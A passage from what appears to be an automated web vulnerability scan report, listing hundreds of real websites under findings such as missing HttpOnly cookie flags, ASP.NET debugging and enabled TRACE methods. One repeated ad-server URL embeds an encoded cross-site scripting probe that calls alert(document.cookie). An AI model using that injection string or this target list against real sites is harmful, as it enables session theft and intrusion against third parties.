12.6. http://www.we7.com/favicon.ico

12.7. http://a.collective-media.net/adj/cm.rev_lee/

12.8. http://a.tribalfusion.com/displayAd.js

12.9. http://a.tribalfusion.com/j.ad

12.10. http://a.triggit.com/pxcwicm

12.11. http://ad.turn.com/server/pixel.htm

12.12. http://ads.adbrite.com/adserver/vdi/742697

12.13. http://ads.pointroll.com/PortalServe/

12.14. http://ads.specificmedia.com/serve/v=5

12.15. http://afe.specificclick.net/

12.16. http://ak1.abmr.net/is/k.collective-media.net

12.17. http://ak1.abmr.net/is/tag.contextweb.com

12.18. http://ar.voicefive.com/b/wc_beacon.pli

12.19. http://ar.voicefive.com/bmx3/broker.pli

12.20. http://as.casalemedia.com/j

12.21. http://b.scorecardresearch.com/b

12.22. http://b.voicefive.com/b

12.23. http://bh.contextweb.com/bh/rtset

12.24. http://cms.quantserve.com/dpixel

12.25. http://cw-m.d.chango.com/m/cw

12.26. http://d.xp1.ru4.com/activity

12.27. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

12.28. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js

12.29. http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js

12.30. http://h.zedo.com/init/0.20843081758144966/g.gif

12.31. http://h.zedo.com/init/0.7280766281441555/g.gif

12.32. http://i.w55c.net/ping_match.gif

12.33. http://ib.adnxs.com/getuid

12.34. http://ib.adnxs.com/mapuid

12.35. http://ib.adnxs.com/ptj

12.36. http://ib.adnxs.com/pxj

12.37. http://idpix.media6degrees.com/orbserv/hbpix

12.38. http://image2.pubmatic.com/AdServer/Pug

12.39. http://k.collective-media.net/cmadj/cm.rev_lee/

12.40. http://open.ad.yieldmanager.net/a1

12.41. http://pixel.quantserve.com/pixel

12.42. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

12.43. http://pixel.rubiconproject.com/tap.php

12.44. http://r.openx.net/set

12.45. http://r.turn.com/r/bd

12.46. http://r1-ads.ace.advertising.com/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1

12.47. http://rs.gwallet.com/r1/pixel/x420r7209935

12.48. http://servedby.flashtalking.com/imp/3/15881

12.49. http://sync.mathtag.com/sync/img

12.50. http://tag.contextweb.com/TagPublish/getad.aspx

12.51. http://tags.bluekai.com/site/2731

12.52. http://tags.bluekai.com/site/3358

12.53. http://www.3stepads.com/favicon.ico

12.54. http://www.bfcu.org/favicon.ico

12.55. http://www.bigtitcreampie.com/favicon.ico

12.56. http://www.bizsiteservice.com/favicon.ico

12.57. http://www.blackchristianpeoplemeet.com/favicon.ico

12.58. http://www.bloomu.edu/favicon.ico

12.59. http://www.cafe.com/favicon.ico

12.60. http://www.cariboucoffee.com/favicon.ico

12.61. http://www.eatdrinkbetter.com/favicon.ico

12.62. http://www.foodsaver.com/favicon.ico

12.63. http://www.gecu-ep.org/favicon.ico

12.64. http://www.hlj.com/favicon.ico

12.65. http://www.kjct8.com/favicon.ico

12.66. http://www.mailfromftd.com/favicon.ico

12.67. http://www.myeecu.org/favicon.ico

12.68. http://www.northstarmls.com/favicon.ico

12.69. http://www.petsupplies.com/favicon.ico

12.70. http://www.prosolutionpills.com/favicon.ico

12.71. http://www.quiltersclubofamerica.com/favicon.ico

12.72. http://www.superstreetonline.com/favicon.ico

12.73. http://www.twilightersanonymous.com/favicon.ico

12.74. http://www.whitepage.net/favicon.ico

13. Cookie without HttpOnly flag set

13.1. http://tag.admeld.com/match

13.2. http://tag.admeld.com/pixel

13.3. http://www.670kboi.com/favicon.ico

13.4. http://www.aquascapeonline.com/favicon.ico

13.5. http://www.asiorders.com/favicon.ico

13.6. http://www.auristechnology.com/favicon.ico

13.7. http://www.beangroup.com/favicon.ico

13.8. http://www.bikersingle.com/favicon.ico

13.9. http://www.biloxi.ms.us/favicon.ico

13.10. http://www.cariboucoffee.com/favicon.ico

13.11. http://www.carolinarustica.com/favicon.ico

13.12. http://www.cholesterollowered.com/favicon.ico

13.13. http://www.conscallhome.com/favicon.ico

13.14. http://www.costore.com/favicon.ico

13.15. http://www.dedicatedserverdir.com/favicon.ico

13.16. http://www.divorcemag.com/favicon.ico

13.17. http://www.dulcolaxusa.com/favicon.ico

13.18. http://www.durangoherald.com/favicon.ico

13.19. http://www.elmresources.com/favicon.ico

13.20. http://www.endfatigue.com/favicon.ico

13.21. http://www.extrabux.com/favicon.ico

13.22. http://www.freshpreservingstore.com/favicon.ico

13.23. http://www.getfreedental.com/favicon.ico

13.24. http://www.governmentgrants.com/favicon.ico

13.25. http://www.grayline.com/favicon.ico

13.26. http://www.grubhub.com/favicon.ico

13.27. http://www.gtop100.com/favicon.ico

13.28. http://www.hitsyndication.com/favicon.ico

13.29. http://www.hocking.edu/favicon.ico

13.30. http://www.homebasedbusinessmatchingservice.com/favicon.ico

13.31. http://www.howtradestocksonline.com/favicon.ico

13.32. http://www.infowarsshop.com/favicon.ico

13.33. http://www.keytrain.com/favicon.ico

13.34. http://www.mountainwestbank.com/favicon.ico

13.35. http://www.msgcu.org/favicon.ico

13.36. http://www.orschelnfarmhome.com/favicon.ico

13.37. http://www.outsideinfo.com/favicon.ico

13.38. http://www.pages02.net/favicon.ico

13.39. http://www.pages05.net/favicon.ico

13.40. http://www.positivepromotions.com/favicon.ico

13.41. http://www.ricedelman.com/favicon.ico

13.42. http://www.ryans.com/favicon.ico

13.43. http://www.sanfranrecruiter.com/favicon.ico

13.44. http://www.sdstate.edu/favicon.ico

13.45. http://www.setonhill.edu/favicon.ico

13.46. http://www.sharethatboy.com/favicon.ico

13.47. http://www.shawdirect.ca/favicon.ico

13.48. http://www.specialops.org/favicon.ico

13.49. http://www.superiorpowersports.com/favicon.ico

13.50. http://www.swissarmy.com/favicon.ico

13.51. http://www.sylvania.com/favicon.ico

13.52. http://www.tahoedailytribune.com/favicon.ico

13.53. http://www.targetcenter.com/favicon.ico

13.54. http://www.teachingtextbooks.com/favicon.ico

13.55. http://www.tempcredit.com/favicon.ico

13.56. http://www.thelaughtermovie.com/favicon.ico

13.57. http://www.tireteam.com/favicon.ico

13.58. http://www.tradearca.com/favicon.ico

13.59. http://www.trafficstrategies.com/favicon.ico

13.60. http://www.travelagentcentral.com/favicon.ico

13.61. http://www.udisglutenfree.com/favicon.ico

13.62. http://www.unitedfcu.com/favicon.ico

13.63. http://www.usairwayscruises.com/favicon.ico

13.64. http://www.usavacuum.com/favicon.ico

13.65. http://www.usg.com/favicon.ico

13.66. http://www.vc.edu/favicon.ico

13.67. http://www.vermontjoblink.com/favicon.ico

13.68. http://www.we7.com/favicon.ico

13.69. http://www.womensenews.org/favicon.ico

13.70. http://www.wtma.com/favicon.ico

13.71. http://a.collective-media.net/adj/cm.rev_lee/

13.72. http://a.tribalfusion.com/displayAd.js

13.73. http://a.tribalfusion.com/j.ad

13.74. http://a.triggit.com/pxcwicm

13.75. http://ad.turn.com/server/pixel.htm

13.76. http://ad.yieldmanager.com/iframe3

13.77. http://ad.yieldmanager.com/imp

13.78. http://ads.adbrite.com/adserver/vdi/742697

13.79. http://ads.pointroll.com/PortalServe/

13.80. http://ads.specificmedia.com/serve/v=5

13.81. http://afe.specificclick.net/

13.82. http://ak1.abmr.net/is/k.collective-media.net

13.83. http://ak1.abmr.net/is/tag.contextweb.com

13.84. http://ar.voicefive.com/b/wc_beacon.pli

13.85. http://ar.voicefive.com/bmx3/broker.pli

13.86. http://as.casalemedia.com/j

13.87. http://b.scorecardresearch.com/b

13.88. http://b.voicefive.com/b

13.89. http://bh.contextweb.com/bh/rtset

13.90. http://cms.quantserve.com/dpixel

13.91. http://contextweb-match.dotomi.com/

13.92. http://csc.beap.ad.yieldmanager.net/i

13.93. http://cw-m.d.chango.com/m/cw

13.94. http://d.xp1.ru4.com/activity

13.95. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

13.96. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js

13.97. http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js

13.98. http://h.zedo.com/init/0.20843081758144966/g.gif

13.99. http://h.zedo.com/init/0.7280766281441555/g.gif

13.100. http://i.w55c.net/ping_match.gif

13.101. http://idpix.media6degrees.com/orbserv/hbpix

13.102. http://image2.pubmatic.com/AdServer/Pug

13.103. http://k.collective-media.net/cmadj/cm.rev_lee/

13.104. http://l.betrad.com/ct/0_0_0_0_179_1228/us/0/1/0/0/0/0/1/242/279/0/pixel.gif

13.105. http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673

13.106. http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s28735217744881

13.107. http://open.ad.yieldmanager.net/a1

13.108. http://pixel.quantserve.com/pixel

13.109. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

13.110. http://pixel.rubiconproject.com/tap.php

13.111. http://r.openx.net/set

13.112. http://r.turn.com/r/bd

13.113. http://r1-ads.ace.advertising.com/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1

13.114. http://rs.gwallet.com/r1/pixel/x420r7209935

13.115. http://servedby.flashtalking.com/imp/3/15881

13.116. http://sync.mathtag.com/sync/img

13.117. http://tag.contextweb.com/TagPublish/getad.aspx

13.118. http://tags.bluekai.com/site/2731

13.119. http://tags.bluekai.com/site/3358

13.120. http://www.3stepads.com/favicon.ico

13.121. http://www.accu-chek.com/favicon.ico

13.122. http://www.aiche.org/favicon.ico

13.123. http://www.aionarmory.com/favicon.ico

13.124. http://www.allentate.com/favicon.ico

13.125. http://www.americaneducationnetwork.com/favicon.ico

13.126. http://www.ashop.com.au/favicon.ico

13.127. http://www.asme.org/favicon.ico

13.128. http://www.ataglance.com/favicon.ico

13.129. http://www.autozonepro.com/favicon.ico

13.130. http://www.awardhq.com/favicon.ico

13.131. http://www.bcbsga.com/favicon.ico

13.132. http://www.bfcu.org/favicon.ico

13.133. http://www.bhgrealestate.com/favicon.ico

13.134. http://www.bigtitcreampie.com/favicon.ico

13.135. http://www.bloomu.edu/favicon.ico

13.136. http://www.bucknell.edu/favicon.ico

13.137. http://www.buymebeauty.com/favicon.ico

13.138. http://www.bvonstyle.com/favicon.ico

13.139. http://www.cafe.com/favicon.ico

13.140. http://www.cbmove.com/favicon.ico

13.141. http://www.charter-business.com/favicon.ico

13.142. http://www.chefuniforms.com/favicon.ico

13.143. http://www.cityofheroes.com/favicon.ico

13.144. http://www.click-now.net/favicon.ico

13.145. http://www.clickmycredit.com/favicon.ico

13.146. http://www.coloniallife.com/favicon.ico

13.147. http://www.creditacceptance.com/favicon.ico

13.148. http://www.dinnerplates.com/favicon.ico

13.149. http://www.eatdrinkbetter.com/favicon.ico

13.150. http://www.einsurancemarket.com/favicon.ico

13.151. http://www.ej.ru/favicon.ico

13.152. http://www.expressionery.com/favicon.ico

13.153. http://www.eztradein.com/favicon.ico

13.154. http://www.familycorner.com/favicon.ico

13.155. http://www.foodsaver.com/favicon.ico

13.156. http://www.fr.st/favicon.ico

13.157. http://www.france3.fr/favicon.ico

13.158. http://www.freebeerandhotwings.com/favicon.ico

13.159. http://www.freightlinertrucks.com/favicon.ico

13.160. http://www.fujifilmusa.com/favicon.ico

13.161. http://www.gardens.com/favicon.ico

13.162. http://www.gecu-ep.org/favicon.ico

13.163. http://www.getastrology.com/favicon.ico

13.164. http://www.gigamoves.com/favicon.ico

13.165. http://www.girlfriendorgasms.com/favicon.ico

13.166. http://www.gravitydefyer.com/favicon.ico

13.167. http://www.greentreepayday.com/favicon.ico

13.168. http://www.gsmls.com/favicon.ico

13.169. http://www.gwinnettcounty.com/favicon.ico

13.170. http://www.hcr-manorcare.com/favicon.ico

13.171. http://www.hlj.com/favicon.ico

13.172. http://www.humana-military.com/favicon.ico

13.173. http://www.imoutdoorsmedia.com/favicon.ico

13.174. http://www.indthegap.com/favicon.ico

13.175. http://www.ipipeline.com/favicon.ico

13.176. http://www.itsmarta.com/favicon.ico

13.177. http://www.jjc.edu/favicon.ico

13.178. http://www.kjct8.com/favicon.ico

13.179. http://www.ksfcu.org/favicon.ico

13.180. http://www.lacounty.info/favicon.ico

13.181. http://www.lasvegasshows.com/favicon.ico

13.182. http://www.learnatest.com/favicon.ico

13.183. http://www.livingwithout.com/favicon.ico

13.184. http://www.locox.com/favicon.ico

13.185. http://www.mailfromftd.com/favicon.ico

13.186. http://www.make-life-easier.com/favicon.ico

13.187. http://www.mem.com/favicon.ico

13.188. http://www.michie.com/favicon.ico

13.189. http://www.microsofthup.com/favicon.ico

13.190. http://www.monsterjam.com/favicon.ico

13.191. http://www.movieretriever.com/favicon.ico

13.192. http://www.mychasebonus.com/favicon.ico

13.193. http://www.myeecu.org/favicon.ico

13.194. http://www.myleather.com/favicon.ico

13.195. http://www.noisecreep.com/favicon.ico

13.196. http://www.northstarmls.com/favicon.ico

13.197. http://www.nwahomepage.com/favicon.ico

13.198. http://www.occasions365.com/favicon.ico

13.199. http://www.ocfl.net/favicon.ico

13.200. http://www.oilshalegas.com/favicon.ico

13.201. http://www.onedollaremailoffer.com/favicon.ico

13.202. http://www.orderupdate.info/favicon.ico

13.203. http://www.orthohomedefense.com/favicon.ico

13.204. http://www.ovationhair.com/favicon.ico

13.205. http://www.petsupplies.com/favicon.ico

13.206. http://www.photos-naturistes.fr/favicon.ico

13.207. http://www.prosolutionpills.com/favicon.ico

13.208. http://www.prostaff.com/favicon.ico

13.209. http://www.quiltersclubofamerica.com/favicon.ico

13.210. http://www.quotit.net/favicon.ico

13.211. http://www.realestateagentsfinder.com/favicon.ico

13.212. http://www.realhog.com/favicon.ico

13.213. http://www.rlcarriers.com/favicon.ico

13.214. http://www.rotary.org/favicon.ico

13.215. http://www.schneider.com/favicon.ico

13.216. http://www.smartbuyingsite.com/favicon.ico

13.217. http://www.smashbox.com/favicon.ico

13.218. http://www.smccme.edu/favicon.ico

13.219. http://www.songselect.com/favicon.ico

13.220. http://www.specialolympics.org/favicon.ico

13.221. http://www.stjulien.com/favicon.ico

13.222. http://www.sueddeutsche.de/favicon.ico

13.223. http://www.superstreetonline.com/favicon.ico

13.224. http://www.surveymk.com/favicon.ico

13.225. http://www.swiss.com/favicon.ico

13.226. http://www.tapartoche.com/favicon.ico

13.227. http://www.thinkfashion.com/favicon.ico

13.228. http://www.tldm.org/favicon.ico

13.229. http://www.trade-schools.net/favicon.ico

13.230. http://www.tvrepairman.com/favicon.ico

13.231. http://www.twilightersanonymous.com/favicon.ico

13.232. http://www.twoofus.org/favicon.ico

13.233. http://www.upmystreet.com/favicon.ico

13.234. http://www.vitamin-insight.com/favicon.ico

13.235. http://www.webcpa.com/favicon.ico

13.236. http://www.whitepage.net/favicon.ico

13.237. http://www.worldfriends.tv/favicon.ico

13.238. http://www.yadvashem.org/favicon.ico

13.239. http://www.zegeridotc.com/favicon.ico

14. Password field with autocomplete enabled

14.1. http://www.ascp.org/favicon.ico

14.2. http://www.atomiclearning.com/favicon.ico

14.3. http://www.bikersingle.com/favicon.ico

14.4. http://www.conscallhome.com/favicon.ico

14.5. http://www.extrabux.com/favicon.ico

14.6. http://www.restaurantrow.com/favicon.ico

14.7. http://www.voa.org/favicon.ico

14.8. http://www.xcomment.com/favicon.ico

14.9. http://www.xcomment.com/favicon.ico

15. Source code disclosure

16. ASP.NET debugging enabled

16.1. http://www.aaaorid.com/Default.aspx

16.2. http://www.adftrack.com/Default.aspx

16.3. http://www.algebralab.org/Default.aspx

16.4. http://www.baen.com/Default.aspx

16.5. http://www.baskinghill.com/Default.aspx

16.6. http://www.bhgrealestate.com/Default.aspx

16.7. http://www.bookmaker.com/Default.aspx

16.8. http://www.brightonfnl.com/Default.aspx

16.9. http://www.classicsonline.com/Default.aspx

16.10. http://www.coloniallife.com/Default.aspx

16.11. http://www.coxenterprises.com/Default.aspx

16.12. http://www.creditacceptance.com/Default.aspx

16.13. http://www.cupsultana.com/Default.aspx

16.14. http://www.elpasoco.com/Default.aspx

16.15. http://www.embark.com/Default.aspx

16.16. http://www.endlessvacation.com/Default.aspx

16.17. http://www.esc4.net/Default.aspx

16.18. http://www.firstresponse.com/Default.aspx

16.19. http://www.freecampgrounds.com/Default.aspx

16.20. http://www.freeltcquotes.com/Default.aspx

16.21. http://www.freightlinertrucks.com/Default.aspx

16.22. http://www.geniecompany.com/Default.aspx

16.23. http://www.goldenlivingcenters.com/Default.aspx

16.24. http://www.gottashopdeals.com/Default.aspx

16.25. http://www.govcourtregistry.com/Default.aspx

16.26. http://www.justgiving.com/Default.aspx

16.27. http://www.kiwikp.com/Default.aspx

16.28. http://www.kohlerplus.com/Default.aspx

16.29. http://www.landsharklager.com/Default.aspx

16.30. http://www.lunchprepay.com/Default.aspx

16.31. http://www.marioncountyfl.org/Default.aspx

16.32. http://www.maxwebsavings.com/Default.aspx

16.33. http://www.moneymailer.com/Default.aspx

16.34. http://www.moveforfree.com/Default.aspx

16.35. http://www.nccde.org/Default.aspx

16.36. http://www.neatco.com/Default.aspx

16.37. http://www.needlepointers.com/Default.aspx

16.38. http://www.netfit.co.uk/Default.aspx

16.39. http://www.outsideinfo.com/Default.aspx

16.40. http://www.pgcc.edu/Default.aspx

16.41. http://www.picnet.com.au/Default.aspx

16.42. http://www.pnf.com/Default.aspx

16.43. http://www.pnwboces.org/Default.aspx

16.44. http://www.polarispartshouse.com/Default.aspx

16.45. http://www.primos.com/Default.aspx

16.46. http://www.psoriasis.org/Default.aspx

16.47. http://www.realbird.com/Default.aspx

16.48. http://www.ritasice.com/Default.aspx

16.49. http://www.roundtablepizza.com/Default.aspx

16.50. http://www.runreappear.com/Default.aspx

16.51. http://www.sfgotobat.com/Default.aspx

16.52. http://www.smith-county.com/Default.aspx

16.53. http://www.stjohnprovidence.org/Default.aspx

16.54. http://www.suppress003.com/Default.aspx

16.55. http://www.threatexpert.com/Default.aspx

16.56. http://www.tmkrms.com/Default.aspx

16.57. http://www.totalinjury.com/Default.aspx

16.58. http://www.totallymoney.com/Default.aspx

16.59. http://www.trackinhalant.com/Default.aspx

16.60. http://www.tracklilliputian.com/Default.aspx

16.61. http://www.trackphial.com/Default.aspx

16.62. http://www.trackzz.com/Default.aspx

16.63. http://www.trade-schools.net/Default.aspx

16.64. http://www.ureader.de/Default.aspx

16.65. http://www.vanceandhines.com/Default.aspx

16.66. http://www.videogamecareers.com/Default.aspx

16.67. http://www.voa.org/Default.aspx

16.68. http://www.westathome.com/Default.aspx

16.69. http://www.wnyjobs.com/Default.aspx

17. Referer-dependent response

17.1. http://ads.adbrite.com/adserver/vdi/742697

17.2. http://www.facebook.com/plugins/recommendations.php

18. Cross-domain POST

18.1. http://www.crystal-co.com/favicon.ico

18.2. http://www.getastrology.com/favicon.ico

18.3. http://www.specialops.org/favicon.ico

18.4. http://www.voa.org/favicon.ico

19. Cross-domain Referer leakage

19.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8

19.2. http://ad.yieldmanager.com/iframe3

19.3. http://ad.yieldmanager.com/imp

19.4. http://ads.bluelithium.com/st

19.5. http://ads.pointroll.com/PortalServe/

19.6. http://ads.specificmedia.com/serve/v=5

19.7. http://adserv.impactengine.com/www/2r/2o/qq/mo/objembed.html

19.8. http://adserv.impactengine.com/www/5o/b6/6d/fj/objembed.html/@@1303756287@@

19.9. http://adserv.impactengine.com/www/a5/zp/va/fr/objembed.html/@@1299531588@@

19.10. http://adserv.impactengine.com/www/sz/7s/d2/pt/objembed.html/@@1299097540@@

19.11. http://as.casalemedia.com/j

19.12. http://bh.contextweb.com/bh/drts

19.13. http://cm.g.doubleclick.net/pixel

19.14. http://cm.g.doubleclick.net/pixel

19.15. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

19.16. http://ib.adnxs.com/ptj

19.17. http://open.ad.yieldmanager.net/a1

19.18. http://www.facebook.com/plugins/recommendations.php

19.19. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php

20. Cross-domain script include

20.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8

20.2. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

20.3. http://www.2-clicks-stamps.com/favicon.ico

20.4. http://www.610wtvn.com/favicon.ico

20.5. http://www.aiche.org/favicon.ico

20.6. http://www.am570radio.com/favicon.ico

20.7. http://www.atomiclearning.com/favicon.ico

20.8. http://www.boyvipdream.com/favicon.ico

20.9. http://www.brighthorizons.com/favicon.ico

20.10. http://www.buymebeauty.com/favicon.ico

20.11. http://www.bvonstyle.com/favicon.ico

20.12. http://www.callsource.com/favicon.ico

20.13. http://www.cavtel.com/favicon.ico

20.14. http://www.click-now.net/favicon.ico

20.15. http://www.coinmerc.com/favicon.ico

20.16. http://www.conscallhome.com/favicon.ico

20.17. http://www.crystal-co.com/favicon.ico

20.18. http://www.dailyfx.com/favicon.ico

20.19. http://www.deguate.com/favicon.ico

20.20. http://www.donbest.com/favicon.ico

20.21. http://www.edgarsnyder.com/favicon.ico

20.22. http://www.extrabux.com/favicon.ico

20.23. http://www.facebook.com/plugins/recommendations.php

20.24. http://www.fateback.com/favicon.ico

20.25. http://www.findire.com/favicon.ico

20.26. http://www.foodsaver.com/favicon.ico

20.27. http://www.fortunecity.co.uk/favicon.ico

20.28. http://www.getfreedental.com/favicon.ico

20.29. http://www.gizmodefenderstore.com/favicon.ico

20.30. http://www.grayline.com/favicon.ico

20.31. http://www.greatnow.com/favicon.ico

20.32. http://www.gtop100.com/favicon.ico

20.33. http://www.halldata.com/favicon.ico

20.34. http://www.herehard.tv/favicon.ico

20.35. http://www.heresquirt.tv/favicon.ico

20.36. http://www.holdonsecuritysite.com/favicon.ico

20.37. http://www.ipodarcade.com/favicon.ico

20.38. http://www.journalofaccountancy.com/favicon.ico

20.39. http://www.maysville-online.com/content/

20.40. http://www.maysville-online.com/favicon.ico

20.41. http://www.mnnews.com/favicon.ico

20.42. http://www.monsterjam.com/favicon.ico

20.43. http://www.motorracingnetwork.com/favicon.ico

20.44. http://www.mrclean.com/favicon.ico

20.45. http://www.mylovedanal.tv/favicon.ico

20.46. http://www.mylovedasses.tv/favicon.ico

20.47. http://www.mylovedrubber.com/favicon.ico

20.48. http://www.mysubtitles.com/favicon.ico

20.49. http://www.mytoolstore.com/favicon.ico

20.50. http://www.nationnews.com/favicon.ico

20.51. http://www.netfit.co.uk/favicon.ico

20.52. http://www.newholdonsecurity.com/favicon.ico

20.53. http://www.playingforchange.com/favicon.ico

20.54. http://www.prettynylonfeet.com/favicon.ico

20.55. http://www.prosolutionpills.com/favicon.ico

20.56. http://www.rb-hosting.de/favicon.ico

20.57. http://www.restaurantrow.com/favicon.ico

20.58. http://www.ricedelman.com/favicon.ico

20.59. http://www.rv-clubs.us/favicon.ico

20.60. http://www.sanfranrecruiter.com/favicon.ico

20.61. http://www.schoolexpress.com/favicon.ico

20.62. http://www.sharethatboy.com/favicon.ico

20.63. http://www.simplybestcoupons.com/favicon.ico

20.64. http://www.socializr.com/favicon.ico

20.65. http://www.specialops.org/favicon.ico

20.66. http://www.squirt-disgrace.net/favicon.ico

20.67. http://www.stopsacidreflux.com/favicon.ico

20.68. http://www.tahoedailytribune.com/favicon.ico

20.69. http://www.tcoasttalk.com/favicon.ico

20.70. http://www.tempcredit.com/favicon.ico

20.71. http://www.teriskitchen.com/favicon.ico

20.72. http://www.ticketleap.net/favicon.ico

20.73. http://www.tireteam.com/favicon.ico

20.74. http://www.torontolife.com/favicon.ico

20.75. http://www.uwstout.edu/favicon.ico

20.76. http://www.vc.edu/favicon.ico

20.77. http://www.visitsouth.com/favicon.ico

20.78. http://www.vivalagames.com/favicon.ico

20.79. http://www.voa.org/favicon.ico

20.80. http://www.wdasfm.com/favicon.ico

20.81. http://www.wendoverfun.com/favicon.ico

20.82. http://www.womensenews.org/favicon.ico

20.83. http://www.xcomment.com/favicon.ico

21. File upload functionality

22. TRACE method is enabled

22.1. http://ads.specificmedia.com/

22.2. http://bh.contextweb.com/

22.3. http://cache.specificmedia.com/

22.4. http://d.xp1.ru4.com/

22.5. http://domainunion.de/

22.6. http://image2.pubmatic.com/

22.7. http://leeenterprises.112.2o7.net/

22.8. http://pixel.rubiconproject.com/

22.9. http://r.openx.net/

22.10. http://tags.bluekai.com/

22.11. http://www.1-800-volunteer.org/

22.12. http://www.123-reg.co.uk/

22.13. http://www.1280.com/

22.14. http://www.20minutos.es/

22.15. http://www.2benet.net/

22.16. http://www.321gold.com/

22.17. http://www.321search.com/

22.18. http://www.3happybytes.com/

22.19. http://www.3reef.com/

22.20. http://www.48hourcashsystem.com/

22.21. http://www.4m.net/

22.22. http://www.a-russian-girl.com/

22.23. http://www.abbee.com/

22.24. http://www.aboutarc.com/

22.25. http://www.aboutnursing.com/

22.26. http://www.abzolute.net/

22.27. http://www.actionsearch.info/

22.28. http://www.activehire.com/

22.29. http://www.adddev2.com/

22.30. http://www.addgfs.com/

22.31. http://www.adhostingsolutions.com/

22.32. http://www.adnet.de/

22.33. http://www.aerotrader.com/

22.34. http://www.afciviliancareers.com/

22.35. http://www.afibstroke.com/

22.36. http://www.agathachristie.com/

22.37. http://www.agingeye.net/

22.38. http://www.agonist.org/

22.39. http://www.aipbjobs.com/

22.40. http://www.airgunsofarizona.com/

22.41. http://www.albireo.ch/

22.42. http://www.allbran.com/

22.43. http://www.allegiance.com/

22.44. http://www.alltrails.com/

22.45. http://www.alltribes.com/

22.46. http://www.altermedia.info/

22.47. http://www.amasci.com/

22.48. http://www.amateurclipz.com/

22.49. http://www.americandiscountcruises.com/

22.50. http://www.aminus3.com/

22.51. http://www.ancestralfindings.com/

22.52. http://www.anonymousspace.com/

22.53. http://www.antiquecar.com/

22.54. http://www.applianceguru.com/

22.55. http://www.appointmentquest.com/

22.56. http://www.aqua-teens.com/

22.57. http://www.aquabid.com/

22.58. http://www.armpitpicture.com/

22.59. http://www.artbusiness.com/

22.60. http://www.aryion.com/

22.61. http://www.asb.tv/

22.62. http://www.ashmax.com/

22.63. http://www.asianage.com/

22.64. http://www.asianmovielola.com/

22.65. http://www.askdocweb.com/

22.66. http://www.askdramy.com/

22.67. http://www.astridsangelcash.com/

22.68. http://www.authentic-campaigner.com/

22.69. http://www.avidpromedical.com/

22.70. http://www.awssettlement.com/

22.71. http://www.b92.net/

22.72. http://www.babynamescountry.com/

22.73. http://www.babynamespedia.com/

22.74. http://www.bagsnob.com/

22.75. http://www.bakersfieldcollege.edu/

22.76. http://www.bbing.org/

22.77. http://www.bbspot.com/

22.78. http://www.beangroup.com/

22.79. http://www.beautifulkiss.com/

22.80. http://www.bebelsecurity26.com/

22.81. http://www.belcan.com/

22.82. http://www.beloblog.com/

22.83. http://www.belowtopsecret.com/

22.84. http://www.bestfastresult.com/

22.85. http://www.bestwesternmichigan.com/

22.86. http://www.bibleatlas.org/

22.87. http://www.bigagnes.com/

22.88. http://www.bigbrilliant.com/

22.89. http://www.bigtitcreampie.com/

22.90. http://www.blackpast.org/

22.91. http://www.bloomsburgfair.com/

22.92. http://www.blueprintaffiliates.com/

22.93. http://www.bluesforpeace.com/

22.94. http://www.boardingschoolreview.com/

22.95. http://www.bobmovs.com/

22.96. http://www.boomboomflicks.com/

22.97. http://www.boyextra.com/

22.98. http://www.boymale.net/

22.99. http://www.boyvipdream.com/

22.100. http://www.braba.com/

22.101. http://www.branditz.com/

22.102. http://www.brazilianbikinishop.com/

22.103. http://www.breastfeeding.com/

22.104. http://www.broadbandinfo.com/

22.105. http://www.broadbandsports.com/

22.106. http://www.brostoons.com/

22.107. http://www.brusselsjournal.com/

22.108. http://www.brutalkingdom.com/

22.109. http://www.bvonstyle.com/

22.110. http://www.cabinetparts.com/

22.111. http://www.cabinsusa.com/

22.112. http://www.californiasciencecenter.org/

22.113. http://www.callsource.com/

22.114. http://www.cancure.org/

22.115. http://www.caraddict4addicts.com/

22.116. http://www.cardschat.com/

22.117. http://www.carolinanavy.com/

22.118. http://www.carports.com/

22.119. http://www.carsandinsurance.com/

22.120. http://www.cartoonplus.net/

22.121. http://www.cartoonterritory.com/

22.122. http://www.cash-advances-in-1-hour.com/

22.123. http://www.cash-program.com/

22.124. http://www.catxoxo.com/

22.125. http://www.cavtel.com/

22.126. http://www.cayenne.com/

22.127. http://www.cbtagclouds.com/

22.128. http://www.ccsdschools.com/

22.129. http://www.celebsauce.com/

22.130. http://www.census-online.us/

22.131. http://www.channelseca.com/

22.132. http://www.cheatoogle.com/

22.133. http://www.childdevelopmentinfo.com/

22.134. http://www.christusrex.org/

22.135. http://www.cieaura.com/

22.136. http://www.circumstitions.com/

22.137. http://www.cirruscasino.net/

22.138. http://www.citydeals.com/

22.139. http://www.cixos.com/

22.140. http://www.clairesslaves.com/

22.141. http://www.cleanjoke.com/

22.142. http://www.clevelandcountyschools.org/

22.143. http://www.clevelandgolf.com/

22.144. http://www.click-now.net/

22.145. http://www.collectibledetective.com/

22.146. http://www.collegeotr.com/

22.147. http://www.coloring-page.com/

22.148. http://www.coloringcastle.com/

22.149. http://www.com-sub.biz/

22.150. http://www.commerceinsurance.com/

22.151. http://www.concreteexchange.com/

22.152. http://www.consumertipsonline.net/

22.153. http://www.contextads.net/

22.154. http://www.coolsearchtoday.com/

22.155. http://www.corestandards.org/

22.156. http://www.corning.com/

22.157. http://www.costcentral.com/

